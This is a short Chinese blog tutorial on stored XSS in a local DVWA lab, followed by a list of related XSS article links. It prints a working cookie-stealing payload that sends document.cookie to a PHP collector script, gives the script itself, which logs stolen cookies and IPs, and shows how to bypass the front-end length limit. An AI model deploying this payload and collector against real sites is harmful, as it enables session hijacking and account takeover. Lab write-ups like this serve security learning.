存储xss实现获取cookie(本地实战)

实战更能体验收获!!!

环境准备:

1.phpstudy

2.dvwa靶场

实战

首先我们在phpstudy指定的localhost网站目录下编写一个xss.php文件,内容如下:

复制代码
<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 

然后进入dvwa靶场(security=low),(stored xss)那关,留言写入如下payload。

payload:<script>document.write('<img src="http://127.0.0.1/xss.php?cookie='+document.cookie+'"width=0 height=0 border=0 />');</script>

但是此关卡有长度限制,简单直接前端改一下长度即可:

50改为1000

刷新一下网页

然后到我们写的xss.php文件的目录下,会有一个cookie.txt文件,上面就会记录cookie及其IP

留言

实战结束留言:如果你拥有自己的网站以及服务器,本地实战就在你自己的服务器上实战即可,不过此处的IP地址也要跟着变化,不变化其实也行,但是改了更有实战的感觉,在此祝你们学习顺利!!!

相关推荐
yenggd2 天前
3种XSS攻击简单案例
前端·xss
盖头盖2 天前
【xss基本介绍】
前端·xss
mooyuan天天3 天前
DVWA靶场通关笔记-存储型XSS(Stored Impossible级别)
xss·xss漏洞·存储型xss·dvwa靶场
喜葵3 天前
前端安全防护深度实践:从XSS到供应链攻击的全面防御
前端·安全·xss
卓码软件测评4 天前
第三方web测评机构:【WEB安全测试中HTTP方法(GET/POST/PUT)的安全风险检测】
前端·网络协议·安全·web安全·http·xss
被巨款砸中4 天前
前端视角下的 Web 安全攻防:XSS、CSRF、DDoS 一次看懂
前端·安全·xss
Bruce_Liuxiaowei5 天前
基于BeEF的XSS钓鱼攻击与浏览器劫持实验
前端·网络安全·ctf·xss
携欢5 天前
PortSwigger靶场之Stored XSS into HTML context with nothing encoded通关秘籍
前端·xss
喜葵6 天前
前端安全防护深度实践:从XSS到CSRF的完整安全解决方案
前端·安全·xss
mooyuan天天7 天前
DVWA靶场通关笔记-DOM型XSS(Impossible级别)
xss·dom型xss·xss漏洞·dvwa靶场